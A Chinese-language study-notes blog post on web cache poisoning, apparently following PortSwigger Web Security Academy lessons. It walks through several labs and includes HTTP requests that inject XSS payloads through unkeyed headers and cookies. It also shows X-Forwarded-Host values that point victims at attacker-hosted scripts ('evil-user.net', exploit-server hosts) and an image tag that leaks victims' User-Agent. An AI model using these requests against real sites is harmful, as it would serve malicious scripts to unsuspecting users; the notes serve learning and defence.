Web缓存投毒（？

Web cache poisoning

What is web cache poisoning?

“Web cache poisoning is an advanced technique” ，好好好，哥们终于学到个”advanced technique”了

这里还提到，这个Web cache poisoning 是攻击者利用server ，cache 来发给其它用户有害的HTTP response。这么看，这种漏洞是针对用户而非客户端的。

分成两个步骤：

攻击者诱使后端服务器产生，包含payload 的response。
上一步成功后，攻击者需要使这个response “cached” ，并在随后”喂“给受害者。

A poisoned web cache可以成为散布多种不同漏洞的方法。可以去再进一步地利用XSS , JS 注入，open redirection等等。

Web cache poisoning research

列举了一些相关地研究工作：

Practical Web Cache Poisoning 2018
Web Cache Entanglement: Novel Pathways to Poisoning 2020
Practical Web Cache Poisoning
Web Cache Entanglement: Novel Pathways to Poisoning

How does a web cache work?

这里需要先理解：web caches是怎么工作的。

如果server对于每个请求，都得分别发送新的response，会极大地消耗资源，而且造成用户体验很差。所以使用Caching来解决上述问题。

woc，只能说，计组开始攻击我，但是不多只能说是

cache 作为用户与server之间的缓冲，它会保存针对特定request的response，通常是保存固定的一段时间。如果这段时间内，有另一个用户发送相同的request，cache就不往server发了，自己就发个response过去了。这样就减轻了server的负担。

这让我有点联想到我当时配置腾讯云时好像设置了个参数，但我不确定是不是这个。Cloudflare是干这个的吗？还是说是代理加速？

Cache keys

cache收到request首先要判断是不是自己能处理，还是要发给server。cache判断的依据就是cache key

Caches identify equivalent requests by comparing a predefined subset of the request’s components, known collectively as the “cache key”.

相应的不在cache key中的部分，就说是unkeyed

如果匹配上了，就认为是equivalent。就发response的副本。这是要注意到这些被忽略的部分，之后会进一步研究。

What is the impact of a web cache poisoning attack?

能造成什么样的损害，主要受俩因素影响：

What exactly the attacker can successfully get cached
这里也是提到，web缓存投毒更多是作为一种分发（？）的方式/途径，而不是一种单独的攻击。所以能造成怎么样的影响，是取决于injected payload的危害性。
The amount of traffic on the affected page
介，很好理解。

by the way ，哥们在写这篇笔记时饱受新冠（疑似？折磨。这个vc泡起来喝，不知为何让我想到了育才后门的豆腐脑（可能是酸的很像蛙鱼？，思乡之情一时间盈满心头。

这里值得注意的一点是,cache的持续时间并不会影响Web cache poisoning造成的危害. 因为攻击者可以编写脚本, 无限地”再投毒”.

Constructing a web cache poisoning attack

这里举出了通常地几个步骤:

Identify and evaluate unkeyed inputs

Any web cache poisoning attack relies on manipulation of unkeyed inputs, such as headers.

一想也是哦,就是利用unkeyed,我最初以为是通过修改keyed来实现攻击.仔细一想,修改了cache key,最后cache不就认为是request不一样了吗,不再方便投放response.

Therefore, the first step when constructing a web cache poisoning attack is identifying unkeyed inputs that are supported by the server.

可以通过手动地随机修改request来观察,是不是对response有影响.可以用Burp Comparer来比较response.

Param Miner

这里介绍了一个自动辨别unkeyed inputs的Burp的插件, Param Miner .
这个图就展示了 Param Miner 找到了一个unkeyed header X-Forwarded-Host

这里提到,在寻找unkeyed inputs时,也有可能导致you generated responoses被发送给真实用户.(我想可能说, 会让用户察觉之类的?) 所以要在你的request中使用unique cache key , 以此来确保不会暴露你生成的responses. 可以在request中添加一个cache buster(比方说独特的参数),来避免上述情况.

Elicit a harmful response from the back-end server

再上一个步骤之后,就是想办法生成harmful response. 尝试去利用输入来构建,比方说那些没有很好地被sanitized地输入,或者是用来生成其它数据的输入,都是可能的entry point

Get the response cached

还需要让上一步构建的response进入缓存. 这里描述的比较概括,感觉没啥用.

Exploiting web cache poisoning vulnerabilities

这里介绍了两种不同的造成Web cache poisoning 漏洞的原因:

cache设计上的漏洞
cache实现上的漏洞

How to prevent web cache poisoning vulnerabilities

hhh,最好的防御方式就是不用cache.当然,他也说这个建议可能很无厘头,但是在一些情况下,比方说你使用CDN,而这个cache只是默认开启的,所以可以考虑下caching有没有这个必要.

然后就是限制caching,只在”purely static responses”的情况下使用.

这里也提到了一个更为普遍的情况:即现在大多数站点,无论是在开发过程中,还是在日常的操作中,都引入了第三方的技术.因此,无论你内部的安全情况怎么怎么好,只要引入了第三方的东西,很大程度上就依赖这些东西的开发者,也要有安全意识.安全是短板效应,所以在你引入第三方技术之前,最好是完全理解它在安全方面所带来的影响.

当这个事情具体到Web cache poisoning时,并不是仅仅是是不是要用caching的问题,还是要考虑别的东西,比方说你用的CDN支持哪些header.
很多Web cache poisoning漏洞发生,就是因为攻击者能够利用一些,不怎么知名的,request headers.很多情况下,这些header对于网站来说,压根用不到.同样的,如果说你用了一些,你并不完全理解,默认情况下支持这些unkeyed inputs的技术,就会存在漏洞.一种header用不到,那就没必要支持/去处理.

在实现caching时,也可以采用一些防范措施:

如果是出于性能考虑, 打算排除一些cache key ,重写request
不要接受GETrequests.(???)因为一些第三方的技术可能会默认允许
就算服务端漏洞看上去不能被利用, 也要打安全补丁.由于cache这个事,它也有可能被利用.

Exploiting cache design flaws

Using web cache poisoning to deliver an XSS attack

最简单的一种web缓存投毒漏洞类型,unkeyed input没有被恰当地处理,最终反应在response中.

request:

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: innocent-website.co.uk

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://innocent-website.co.uk/cms/social.png" />

X-Forwarded-Host被用来动态地生成an Open Graph image URL(我不知道这是个啥) , 会反映在response中.通常这个header时unkeyed的.在这个例子中,它就能用来投毒.

payload:

GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>" //注意!

HTTP/1.1 200 OK
Cache-Control: public
<meta property="og:image" content="https://a."><script>alert(1)</script>"/cms/social.png" />

Using web cache poisoning to exploit unsafe handling of resource imports

Some websites use unkeyed headers to dynamically generate URLs for importing resources, such as externally hosted JavaScript files.

GET / HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: evil-user.net
User-Agent: Mozilla/5.0 Firefox/57.0

HTTP/1.1 200 OK
<script src="https://evil-user.net/static/analytics.js"></script>

Lab: Web cache poisoning with an unkeyed header

这里有个提示去用X-Forwarded-Host,woc,结果我这一看,GET request压根没这个header

看了题解,是自己去加X-Forwarded-Host头,观察到response中相应地value被用来动态地生成一个”an absolute URL for importing a JavaScript file stored at /resources/js/tracking.js.”
然后就是再发个request,观察到response中有个headerX-cache , 说明它是从cache发回来的,这就使我们利用漏洞成为可能.
然后这里solution说,来到exploit server中,修改file name来匹配这个response中的路径/resources/js/tracking.js , body中就填写payloadalert(document.cookie)

然后就是发送request来投毒

1	X-Forwarded-Host: YOUR-EXPLOIT-SERVER-ID.exploit-server.net

我之前做的时候并没有把cache buster当回事,现在一看还不行,有很大影响.
不好意思我sb了,首先我放X-Forwarded-Host把整个url包含https://都放上了,不知怎么回事它就会用referer头(而且这个情况我之后无法复现) , 在修改了这个错误之后,我又发现我没有把url删除全,response中的path变成了/resources/resources,我是怎么发现的呢?我访问了一下,┑(￣Д ￣)┍
修改了以上错误之后,lab就被正常solve了.

除了上述的X-Forwarded-Hostheader外,cookie也常被用来动态生成response中的内容. 常见的功能就是指出用户所用的语言,用来加载对应版本的网页.

GET /blog/post.php?mobile=1 HTTP/1.1
Host: innocent-website.com
User-Agent: Mozilla/5.0 Firefox/57.0
Cookie: language=pl;
Connection: close

When cookie-based cache poisoning vulnerabilities exist, they tend to be identified and resolved quickly because legitimate users have accidentally poisoned the cache.
像上述http request,如果Cookie是unkeyed , Host是cache key的话,所有相同请求的用户都会看到波兰语的页面 , 所以说”legitimate users have accidentally poisoned the cache”.

这里看到相应的cookie:

1	Cookie: session=pd1RuEtKzuC1P5l9oLxesgBALNgUJ0qo; fehost=prod-cache-01

那么我想可能是从fehost入手?

试着将value改成了test,发现在response中有相应的元素

1
2
3

<script>
            data = {"host":"0a57001b04c630cb8210615200530057.web-security-academy.net","path":"/","frontend":"test"}
        </script>

坏了,我又忘加cache buster了
看了题解,是把他"给闭合,添加XSS代码fehost=someString"-alert(1)-"someString
然后解决了,这个lab不需要用exploit server

Using multiple headers to exploit web cache poisoning vulnerabilities

上面说的都是简单情况,大多数情况下不会这么简单.

GET /random HTTP/1.1
Host: innocent-site.com
X-Forwarded-Proto: http

HTTP/1.1 301 moved permanently
Location: https://innocent-site.com/random

注意这里redirection用了https,但不是这种情况下就没有漏洞了,攻击者可以利用这个操作来把受害者重定向到一个恶意URL.

Lab: Web cache poisoning with multiple headers

这里提示:This lab supports both the X-Forwarded-Host and X-Forwarded-Scheme headers.

~~构造了个request后,发现X-Forwarded-Host在response中有反应~~整错了,自己瞎加cache buster结果整不对了.

看了solution

这里不是由homepage引入的了,而是从http history中发现,有对/resources/js/tracking.js 的request , 而response如下:

HTTP/2 200 OK
Content-Type: application/javascript; charset=utf-8
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 70

document.write('<img src="/resources/images/tracker.gif?page=post">');

添加X-Forwarded-Host后发现response中并没有什么影响.移除这个header ,并添加X-Forwarded-Scheme后发现response多了个Location

HTTP/2 302 Found
Location: https://0ac400ba04c7e511803c08db00530054.web-security-academy.net/resources/js/tracking.js
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 0

把俩header都加上之后,发现有了构造

Informational responses (100 – 199)

Successful responses (200 – 299)

Redirection messages (300 – 399)这个302就属于这种情况

Client error responses (400 – 499)

Server error responses (500 – 599)
1
2
3
4
5
6
7
HTTP/2 302 Found
Location: https://example.com/resources/js/tracking.js
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=30
Age: 0
X-Cache: miss
Content-Length: 0
这里接下来就是利用exploit server 来实现恶意的重定向了

最终构造的request如下:

GET /resources/js/tracking.js HTTP/2
Host: 0ac400ba04c7e511803c08db00530054.web-security-academy.net
Cookie: session=pvYcUhcbwf2XHf8KZ2kMx93xwoVifqRC
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://0ac400ba04c7e511803c08db00530054.web-security-academy.net/product?productId=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-Scheme: xiaxie
X-Forwarded-Host: exploit-0a0400f0040ee58d8078079b01ac006d.exploit-server.net

Exploiting responses that expose too much information

Cache-control directives

web cache poisoning比较重要的一步 , 是怎么把这个构造出来的response “get cached”. 有些情况下, response就会暴露一些攻击者实现所需要的信息.

HTTP/1.1 200 OK
Via: 1.1 varnish-v4
Age: 174
Cache-Control: public, max-age=1800

我理解的是, 这种情况下, 就方便攻击者编写脚本 , 自动化定期投毒.

Vary header

最初经常会用一个Varyheader , 这就给攻击者提供了帮助(? 我一没见过,二也不知道咋提供的帮助).

The Vary header specifies a list of additional headers that should be treated as part of the cache key even if they are normally unkeyed.

艹 , 底裤给人看光了. 通常会用Vary来指明User-Agent是keyed , 所以移动版本的页面就不会被提供给桌面端的用户.

这种信息就可能被用来构建针对特定用户集的多步的攻击. 就是攻击者可以利用这个, 比方说,只对移动端用户发起攻击.

Lab: Targeted web cache poisoning using an unknown header

这个lab就是希望 , 针对特定类型的用户发动攻击.

这里看HTTP history看到 , 也有个GET request 去请求/resources/js/tracking.js , 包括也看到了Varyheader . 但是这里感觉是无从下手 , 看了solution发现步骤较为复杂:

这里要使用Param Miner 拓展来猜测可能的头. 然后通过X-Host来实现输入.
然后是在X-Host添加value , 发现会被动态地生成”an absolute URL for importing the JavaScript file” , 在/resources/js/tracking.js, 跟第一个lab一摸一样.然后就是构造相应payload的过程
但是注意这个lab要求针对特定用户来实施攻击, 所以还要求找出这些用户的User-Agent . 这一步是通过XSS漏洞实现的, 观察到评论是支持HTML tags的. 所以通过XSS漏洞来探明用户的User-Agent
1
<img src="https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/foo" />
这里看到User-Agent值为Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36

然后通过exploit server的Access log来观察User-Agent ,然后根据这个header 去构造恶意request , 使恶意response存储在cache中.
最终构造的request如下:

GET / HTTP/1.1
Host: 0aaf00e703bdb2d280d53f140036001a.h1-web-security-academy.net
Cookie: session=uDUHGd9RjJ8iKMJd3awoAxfEZsSALBAf
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0aaf00e703bdb2d280d53f140036001a.h1-web-security-academy.net/post?postId=4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-Host: exploit-0ab500a70350b2e3804d3eba01100059.exploit-server.net
Connection: close

Using web cache poisoning to exploit DOM-based vulnerabilities

这里也是提到, 除了像是上述lab中插入JavaScript 文件, 还可能插入别的恶意文件.

If a script handles data from the server in an unsafe way, this can potentially lead to all kinds of DOM-based vulnerabilities.

也可能说插入包含如下payload的JSON 文件:{"someProperty" : "<svg onload=alert(1)>"} , 如果website把这项值传到个支持动态代码执行的sink(?)里, 这个payload就会在受害者浏览器session中执行.

If you use web cache poisoning to make a website load malicious JSON data from your server, you may need to grant the website access to the JSON using CORS这部分忘得一干二净了,当然,但是也没大懂.

DOM-based vulnerabilities

Lab: Web cache poisoning to exploit a DOM vulnerability via a cache with strict cacheability criteria

这个lab涉及到DOM漏洞 , 不是很了解.

Chaining web cache poisoning vulnerabilities

复合多种攻击方式, web cache poisoning仅仅作为分发的一种途径.

Lab: Combining web cache poisoning vulnerabilities

介lab更是复杂, 以后再来探索把.

Exploiting cache implementation flaws

上述提到的利用unkeyed inputs的漏洞利用方法, 虽然很有效 ,但是仅仅只是涉及到web cache poisoning 的一些皮毛 .

这里就介绍的”exploiting quirks in specific implementations of caching systems” 能够接触到更大的攻击面. 这里介绍了一些”新”技术. 来自他们研究主管在2020年BlackHat上做的报告.

对我来说 , 已经很新了.

Cache key flaws

Generally speaking, websites take most of their input from the URL path and the query string.

深以为然 , 尽管我的知识与经验很是浅薄.

但是说由于request line 通常是作为cache key的一部分, 所以针对web缓存投毒这种类型的漏洞 , 反而不大合适. 因为说 ,插入到这些部分的payload会变成cache buster , 根本不会到受害者手里.

更进一步的说, 特定cache 系统 ,它的个逻辑 , 可能不会像你预期的那样 . 实际上很多website和CDN都会对keyed components做很多变动.比方说:

排除query string
过滤特定query参数
正常化keyed component中的输入
这些变动就带来一些意料之外的结果, 尽管说都来自于相同的输入 , 这些数据 , 在被写入cache key 的过程和最终传送给 application code的过程 , 也会有差异.

但是在fully integrated, application-level caches的例子中, 这些意料之外的结果可能差异更大 .

Cache probing methodology

寻找cache implementation漏洞的过程跟 classic web cache poisoning 是有些许不同的 , 比较依赖于具体的cache实现和配置 , “vary from site to site” (我喜欢这句英语).

概括性地说 , 遵循三个步骤:

Identify a suitable cache oracle没理解这个oracle是什么? [[#Identify a suitable cache oracle]]
Probe key handling
Identify an exploitable gadget

Identify a suitable cache oracle

A cache oracle is simply a page or endpoint that provides feedback about the cache’s behavior.

辨别这个cache oracle ,就要求确实得是”cacheable” 并且是通过一些迹象 ,来表明responses是来自server 的还是cache. 这个feedback也可能有多种方式:

有个HTTP header 显式地告诉你了是不是cache过来的
观察动态内容的变化
不同的response时间

Ideally, the cache oracle will also reflect the entire URL and at least one query parameter in the response.
这就方便去比较来自cache的和来自server的之间的差异 .

如果说能找到用的什么特定的服务, 就可以通过读对应的文档来看看默认的cache key是怎么构建的.可能有一些有用的技巧提示啥的 , 比方说

Akamai-based websites may support the header Pragma: akamai-x-get-cache-key, which you can use to display the cache key in the response headers

Probe key handling

这一节主要介绍如何去探明对 key 的处理方式 , 去扩大攻击面 . 特别的, 就是要去关注这个transformation , 比方说去对比不同输入带来的key ; 去发送两个相同的request来对比response.

比方说接下来的这个例子, 假定cache oracle 在 home page , 用了Host头去动态地生成Locationheader

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com/en
Cache-Status: miss

为了测试端口是不是被cache key排除在外了 , 就可以先发送一个request ,带着任意端口:

GET / HTTP/1.1
Host: vulnerable-website.com:1337

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com:1337/en
Cache-Status: miss

然后再发送另一个不带端口的:

GET / HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 302 Moved Permanently
Location: https://vulnerable-website.com:1337/en
Cache-Status: hit

这就表明了,端口确实是被排除在外的.

尽管Host是keyed , 但是这个处理的方式(transformation) , 还是允许我们去注入payload .

这一节读的云里雾里